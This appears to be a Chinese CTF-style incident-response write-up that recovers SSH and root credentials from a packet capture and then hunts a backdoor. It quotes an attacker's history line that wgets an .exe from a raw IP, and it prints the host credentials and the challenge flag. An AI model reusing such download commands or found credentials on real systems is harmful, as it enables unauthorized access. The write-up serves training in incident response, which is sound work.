挑战赛第四关应急响应题目通关秘籍

本文作者:Cherishao(信安之路作者团队成员 & 信安之路应急响应小组组长) 招新文章:原创 信安之路应急响应小组招募志同道合的朋友

题目地址:

http://zuohaoyingjixiangyinghennan.xazlsec.com

首页截图如下:

一、获取攻击者的 root

既然前文提到了溯源攻击者,又给了流量包pcapng包,自然是从流量下手;Wireshark 走起。

协议分级,先看看是否请求下载了什么东西,filter:http,发现请求了以下几个文件。

看到了有个 Flag 相关的压缩包,先将其导出来,看看里面有啥:

一个公钥、一个私钥,这就不难猜出是利用 RSA 加密了,上面的神秘代码,应该就是密文,

在线 RSA 加密/解密工具

http://tools.jb51.net/password/rsa_encode

解密如下:

得到了一个eK8}vD3=的文本,上面给了攻击者的 IP,探测发现开启 SSH 服务,尝试登录 root 失败,思考下发现还有个 passwd.jpg 的文件。下载下来看看先;edge 浏览器打开图片发现如下内容:

原来是 Base64 的图片加密,图片转换 Base64:

http://imgbase64.duoshitong.com/

还原看看:得到了一个字符串*mGX3Y-d

知道 IP,又得到了passwd*mGX3Y-d,nmap 扫描了只开启 22 端口,爆破的话,又限制了 IP 的次数,继续看看通信流:

发现存在一个username=C3A37087469, 知道了 IP 又知道了用户尝试 SSH 登录,一不小心就成功了,真是厉害:).

ssh C3A37087469@207.148.27.120 *mGX3Y-d

二、找到了那 backdoor

既然进来了,那就找后门呗!先看下当前目录下,有什么吧!

[C3A37087469@vultr ~]$ ls

key.sh

这 KEY 也太容易找到了吧!别激动,少年!看看内容先。

[C3A37087469@vultr ~]$ catkey.sh

#@Cherishao

echo“Good job!!"

:) Congratulations, you have come here.

  However, you need a higher level of permissions!!!

  It is said that higher privilege passwords are more complicated(16bit).

提示需要更高的权限,那自然就是root了,难不成要提权?自然不是,提示 16bit, 一般默认的初始 vps 密码都会是 16bit,前面不是得到了 2 个字符串嘛,拼接起来:eK8}vD3=*mGX3Y-d,刚好 16bit :) 这脑洞有点大呀!

[C3A37087469@vultr ~]$ suroot
Password:
[root@vultr C3A37087469]# 

(1)查日志,看历史命令,定位到文件位置

先大致检索个吧!ps -ef |grep backdoor* 还真有,少年你太天真了,这么傻的直接命名为这个嘛

[root@vultr ~]# ps -ef |grep backdoor.exe

root      5989 5960 008:58 pts/0    00:00:00 grep--color=auto backdoor.exe

[root@vultr ~]#

(2)还是老老实实的看看 history 先吧!wget了其它的exe 去看看吧

wget http://173.82.235.146/xazlER.exe

(3) 对 xazlER.exe 进行分析,点击既然要输入密码

(4)密码在哪儿呢?你问我,我也想知道呀!莫不是要逆向这个 PE 文件,别慌,不会那么难,看看属性吧!这原始文件名,怎么有一种似曾相识的感觉,对的,少年,就是它(之前的登录密码:) )

(5)用它来解密,看看

这里得到了最后的

key:KEY{xazlER006HappyMid-AutumnFestival}

总结

本小题,主要考查了应急响应中的流量分析(文件提取、加解密当然这里设置的场景较为简单),以及 Linux 下后门排查的相关小知识,题目的类型:类似 CTF 里面的misc,难度不是特别大,但是还是比较烧脑,有些东西不要只是想,想到了还是要去试,祝大家玩得开心的同时,也能学到东西。

原文发布于微信公众号 - 信安之路(xazlsec)

原文发表时间:2018-09-27

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

保护微服务(第一部分)

面向服务的体系结构(SOA)引入了一种设计范式,该技术讨论了高度分离的服务部署,其中服务间通过标准化的消息格式在网络上通信,而不关心服务的实现技术...

15250
来自专栏DeveWork

从Akismet 黑名单中洗白的方法

很久之前就不用Akismet 这个WordPress 官方垃圾评论拦截插件了,因为误杀率实在是太大了。Jeff的那个评论邮箱不幸被拉入黑名单更说明了这一点。前天...

23890
来自专栏FreeBuf

色情网站的光棍节“福利”:加密式挂马玩转流氓推广

双十一前夜,还想着通过同城交友或是某些不可描述的网站一解单身的烦恼?别急,不妨先来看看这些网站给光棍发的“福利”! 最近,360安全中心监测到一起网站弹窗广告挂...

27580
来自专栏FreeBuf

钓鱼邮件攻击中的猥琐技巧与策略

引言 钓鱼邮件攻击是社会工程学攻击中的一种常见的手段,其目的是欺骗受害人来进行一些操作,最终控制受害人。一般来说,钓鱼邮件从后续的攻击手段来说,可以分为两类: ...

30260
来自专栏黑白安全

iOS ZipperDown 漏洞来袭,我们该如何应对?

昨天傍晚盘古实验室负责任的披露了针对 iOS 应用的 ZipperDown 漏洞,并提供了检索、查询受影响应用的平台: zipperdown.com。基于目前公...

7520
来自专栏知晓程序

账号太多记不住?快用这款小程序,跟「忘记密码」说再见

从纸媒时代到移动信息时代,不论是小到衣食住行与日常社交,还是大到行车旅游与财会管理,几乎任何事的开始,似乎都无法避免输入一对匹配的账号和密码。

14260
来自专栏西枫里博客

阿里短信通知的接入与实现(二)暨云通信短信平台API接口调用

事情变化太快,上线还不到一个月的注册短信验证功能就遇到了平台搬家的尴尬。阿里云发了一个邮件通知。原淘宝短信和阿里云市场短信将迁移到云通信平台,自2018年1月2...

33730
来自专栏杨建荣的学习笔记

服务器搬迁需要注意的几个地方

假设一台服务器要从一个机房迁移到另外一个机房,这个过程就好比你去出差,从北京到上海,怎么准备才是最方便,安全,快捷的。 如果出去时间不长,有了银行卡,...

41460
来自专栏架构师之路

im协议设计选型(上)

im协议设计选型(上) 周末在一个Qcon群里分享了一些im技术,抽取出其中im协议选型相关的内容,跟大家分享。 分享人:58沈剑,58同城技术委员会主席,高级...

432100
来自专栏禹都一只猫博客

Zabbix:企业微信报警配置

78280

扫码关注云+社区

领取腾讯云代金券